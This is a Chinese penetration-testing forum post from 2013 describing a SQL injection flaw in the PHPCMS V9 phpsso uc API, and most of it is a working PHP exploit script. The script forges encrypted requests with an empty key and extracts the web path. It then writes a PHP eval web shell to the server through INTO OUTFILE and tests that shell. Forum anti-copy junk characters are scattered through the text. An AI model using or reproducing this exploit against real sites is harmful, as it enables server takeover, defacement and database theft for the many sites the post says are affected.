中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
  ?; c2 k. R# W: C% G& y
所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
5 z" ?: l0 v2 J5 Z    public function deleteuser($get,$post) {
8 M5 R: L* \- [0 \, i2 K0 {        pc_base::load_app_func('global', 'admin');
0 s) `6 W( d& \6 k) I        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
' _. {/ ]+ n! q# k  u+ f: _6 LSELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
0 A- [6 G# H4 w* E" b: K6 n
利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
) w; S* j( @( v8 L' F2 W; S/ ~<?php
  |7 _: H9 V) P- K- O; ]1 W8 S) pprint_r('
& T" C8 _2 F7 u- ?+ ~---------------------------------------------------------------------------
" p; u  V# f3 g' I1 t, HPHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
) G# X5 n  N2 R% ~1 a');
) s6 q! t: X" u' ?
( ^1 y' |  X' v5 q% ~if ($argc<3) {
3 K- \) i" F* D6 V, o' k7 d) o    print_r('
; ?, l  J5 X; {---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
* H" H" _: T- M! `" v# fhost:      target server (ip/hostname)
path:      path to phpcms
Options:
) q( W) e" H2 n" d -p[port]:    specify a port other than 80
. c+ c2 n# ~( h  k& J -P[ip:port]: specify a proxy
Example:
* B/ W( d7 t+ xphp '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
---------------------------------------------------------------------------
');
    die;
}

error_reporting(7);
- V/ M+ L% O9 W% f% t8 E* x9 _: Jini_set("max_execution_time",0);
+ U; R, ?6 [0 u: ~# o: mini_set("default_socket_timeout",5);

% j, s" ~( U7 hfunction quick_dump($string)
4 W8 G; O: @1 }$ V, T{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
2 a5 M/ l# \4 P2 V* Q! V   else
/ x* v9 R$ I. [( _/ p( E1 W   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
' ]3 I2 K# D" G2 J1 B   {$exa.=" ".dechex(ord($string[$i]));}
8 b2 U4 v' [" ?! Z* c0 V$ o; g   else
5 |! O* b: ]/ R* ^# W   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
( G' f( r! @- _7 C5 V, R- Y  }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

) _3 D4 R4 L! m% s% ]* Dfunction send($packet)
3 j% R2 j# m# Q5 t8 n  d{
# K/ B# m* Y7 Z% p) f+ A* F, N  global $proxy, $host, $port, $html, $proxy_regex;
! P: q, p; u7 j) O  G) L0 x+ ]1 g; _  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
: O+ j2 X) V$ t/ d+ k    }
8 c, T) N/ Z( m3 r) o$ R: e, ?/ z  }
; I7 X! j0 y% R' C6 D  else {
" H6 ~4 L0 X- o! e8 t! X5 v        $c = preg_match($proxy_regex,$proxy);
$ e3 T8 u7 T4 x; v6 u/ B5 V    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
: \- ~5 u1 G* z+ T' z* L9 p' F    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
9 K0 y; Z  s) ~/ P1 M9 r$ t    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
; d; w% P  e% Q$ ?8 T9 e1 i    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
* k/ g3 j. A( p+ r8 Y      echo 'No response from proxy...';die;
        }
! m1 M6 p7 ~2 d) T  }
  fputs($ock,$packet);
. `2 J# W8 l) d' V" o  if ($proxy=='') {
# e+ d0 F" B/ x& a    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
1 O- [8 x2 c1 r6 q: k# i6 E  }
$ g3 H7 l; [8 C) {6 x  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
" S# J# s' d& D- d4 l  x      $html.=fread($ock,1);
    }
  }
  fclose($ock);
$ p2 Q5 c# P" {}
4 |7 q  q" ~% S
6 i% A: P! c1 f8 ]; G  r1 [: m8 Z9 s) b$host=$argv[1];
$path=$argv[2];
: x% P7 N# c# |# ?  W- ]$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
8 ]! _% m. Q' Z: n) F' `0 z$temp=$argv[$i][0].$argv[$i][1];
7 x+ ?3 K; Y, Jif ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
: W' P5 d0 L4 \, S$ I  k' C}
4 d) j4 _0 p4 l4 \# z8 Iif ($temp=="-P")
{
1 ?4 E5 z- W4 @" S! `  $proxy=str_replace("-P","",$argv[$i]);
' k' z/ p- }' E3 [5 @& ]8 m1 i$ ?! l}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+ C4 x2 N) J5 K( O" `  tif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
1 X' `& M8 F4 K3 X* G  S. O
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

% \, _+ ^5 A4 ^+ N    $ckey_length = 4;
1 X( g0 I/ z% L- ~9 n5 b' U
: C6 W- i, n  c$ W& d    $key = md5($key ? $key : '');
& m. F9 w) ]4 R; F) F  T4 C4 R6 m/ j    $keya = md5(substr($key, 0, 16));
" b( T1 Z: X  c9 a1 [% a, V5 E    $keyb = md5(substr($key, 16, 16));
: x7 J4 T8 U$ B    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$ I6 U- U) t6 d" M7 A8 X- s
    $cryptkey = $keya.md5($keya.$keyc);
5 S5 S* l1 c' M- X5 W2 I    $key_length = strlen($cryptkey);

' k8 s5 W7 `5 j- O. x3 U; |! n, x    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
  v! d$ O9 a- R4 }5 m
6 J/ u* i* ~% k& G/ _. ^, V) q    $result = '';
1 s; |4 q. i/ _0 |6 g* K" k4 _$ H    $box = range(0, 255);
1 ?$ x" z9 ]4 [/ u! D2 Q5 c
7 R# X# u% |3 }; ~! u, B  Z) O    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
, ^: A$ Q# `+ n* L6 Y        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
6 ]) |5 V: V" Y& t/ T9 H5 ?5 W$ F( h9 p    }
2 u# z) F- w# `1 p1 C% @( T
    for($j = $i = 0; $i < 256; $i++) {
" I0 b& c- u) |- g5 Y        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
, F2 V$ R& Q8 k; H8 S% ^) J        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
2 ^/ M. P0 Y3 P8 D
    for($a = $j = $i = 0; $i < $string_length; $i++) {
, z% J7 A" W: @' |$ ~: A! B- Q( D; F        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
4 l4 c: b3 s/ }7 _        $box[$a] = $box[$j];
        $box[$j] = $tmp;
+ W. f2 R9 u7 N  ?5 w" l        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

. R- d. c& ]) P# N8 x    if($operation == 'DECODE') {
/ s' k& w$ T# r& Z0 B9 E        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
& _  N" o, M) N  w            return substr($result, 26);
/ ~8 ^3 d, u, S; k        } else {
            return '';
        }
7 U- J+ p) _* n4 Y( ~. w: @; A9 t0 \    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
0 }4 z/ i% U" I0 W    }
  T, R/ {6 d6 U+ ~! p4 i- ]0 z
) [% {- H5 @2 c% o7 T3 U}
+ G& A$ ~; u/ Y
$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
; K, {& T% g) H% p( p5 J* l) K  h$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
* U5 F, M& [, \. w8 L6 vsend($packet);
if(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
6 z8 v; O" ]. E9 }4 `echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
6 p& k3 {" D6 R# B& [# d6 ~9 N5 Z$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
' B+ L7 t3 Q1 s. E! x$packet.="User-Agent: Mozilla/5.0\r\n";
1 D* a2 p$ }8 m: _5 D. b$packet.="Host: ".$host."\r\n";
' q& i  L# @- `5 Z$packet.="Connection: Close\r\n\r\n";
send($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
2 X3 S9 B5 q# ~9 g) G//print_r($matches);
5 D# l0 Y: \( X# M3 yif(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
( {, \. j% _2 |" g$SQL = "time=999999999999999999999999&ids=1)";
( R8 _5 B% P- \$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
! x2 e* a! a' s( B7 _( E' W& c2 L' ~( K$SQL.="&action=deleteuser";
: o$ |$ t7 A# C, V$SQL = urlencode(authcode($SQL, "ENCODE", ""));
- z: K4 V2 X. [% d7 E5 Cecho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
. ^7 z$ W% R9 o, Q1 w5 z! a6 C$packet.="Host: ".$host."\r\n";
) F1 L' n, ]* f" d% z) F$packet.="Connection: Close\r\n\r\n";
3 g) w; e# A/ T0 {send($packet);
; x! U& P# h( D. n5 a, Q. |if(strpos($html,"Access denied") > 0){
, K' e9 ]3 G; U2 e* S' G2 Hecho "[-] MYSQL权限过低 禁止写入文件 ";
die;
}
% C$ \- l  F( ]. S: Hecho "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
% g2 i" @/ d% _  k" h" s$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
9 ~$ U0 C( Q+ ^4 f$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
3 c! I* e' s0 w7 |( G3 ?$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"<title>phpinfo()</title>") > 0){
3 t9 m( Q" g+ \7 R' Necho "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
}
6 W) z2 ]9 r9 c0 u( }}else{
echo "[-]未取到web路径 ";
}
0 h% [8 A& [6 s, Z/ P) B. {}else{
% p: c0 e) e/ T" \* Iecho "[*]不存在SQL注入漏洞"."\n";
- J. f# y2 M. s$ H}

; M2 J0 X; k5 D+ R7 Q5 t$ T?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2